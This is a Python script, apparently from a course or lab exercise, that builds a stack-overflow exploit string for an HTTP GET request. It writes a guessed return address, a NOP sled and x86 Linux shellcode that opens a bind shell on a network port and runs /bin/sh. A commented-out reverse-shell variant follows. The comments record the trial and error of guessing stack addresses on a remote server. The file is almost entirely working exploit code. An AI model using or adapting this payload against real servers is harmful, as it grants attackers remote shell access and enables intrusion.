from __future__ import print_function

#print("GET /", end="")

for x in range(37):
    #local address 0xffffd54c 0xff ff d5 4c
    #FFFFD54C only for index tho for some reason 
    #with my new code it's FFFFD5CC
    #added 50 0xFF FF D5 FE
    #print("\\x7E\\xD5\\xFF\\xFF",end="") #address is 4 bytes 
    #print("\\xFE\\xD5\\xFF\\xFF",end="") #address is 4 bytes 
    #for the remote server the top of the frame is bffffff so add 70 ish to that? and might have to playw / that
    #BFFFF5AC for 62 bit machine 
    #top of stack bfffffff.
    #top of stack - 500 BFFFFE 0B
    #top of stack - 600 BFFF FD A7
    #top of stack - 700 BFFF FD 43
    print("\\x43\\xFD\\xFF\\xBF",end="")
#addings NOPS
for x in range(100):
    print ("\\x90", end="")

#shellcode
print("\\x31\\xc0\\x50\\x40\\x89\\xc3\\x50\\x40\\x50\\x89\\xe1\\xb0\\x66\\xcd\\x80\\x31\\xd2\\x52\\x66\\x68\\x13\\xd2", end="")

print("\\x43\\x66\\x53\\x89\\xe1\\x6a\\x10\\x51\\x50\\x89\\xe1\\xb0\\x66\\xcd\\x80\\x40\\x89\\x44\\x24\\x04", end="")

print("\\x43\\x43\\xb0\\x66\\xcd\\x80\\x83\\xc4\\x0c\\x52\\x52\\x43\\xb0\\x66\\xcd\\x80\\x93\\x89\\xd1", end="")

print("\\xb0\\x3f\\xcd\\x80\\x41\\x80\\xf9\\x03\\x75\\xf6\\x52\\x68\\x6e\\x2f\\x73\\x68\\x68\\x2f\\x2f\\x62\\x69\\x89\\xe3", end="")

print("\\x52\\x53\\x89\\xe1\\xb0\\x0b\\xcd\\x80", end="")

#print("\\x6a\\x66\\x58\\x6a\\x01\\x5b\\x31\\xd2\\x52\\x53\\x6a\\x02\\x89\\xe1\\xcd\\x80\\x92\\xb0\\x66\\x68\\x7f\\x01\\x01\\x01\\x66\\x68\\x24\\x77\\x43\\x66\\x53\\x89\\xe1\\x6a\\x10\\x51\\x52\\x89\\xe1\\x43", end="")
#print("\\xcd\\x80\\x6a\\x02\\x59\\x87\\xda\\xb0\\x3f\\xcd\\x80\\x49\\x79\\xf9\\xb0\\x0b\\x41\\x89\\xca\\x52\\x68\\x2f\\x2f\\x73\\x68\\x68\\x2f\\x62\\x69\\x6e\\x89\\xe3\\xcd\\x80", end="")

#46 bytes 
print(" HTTP",end="")
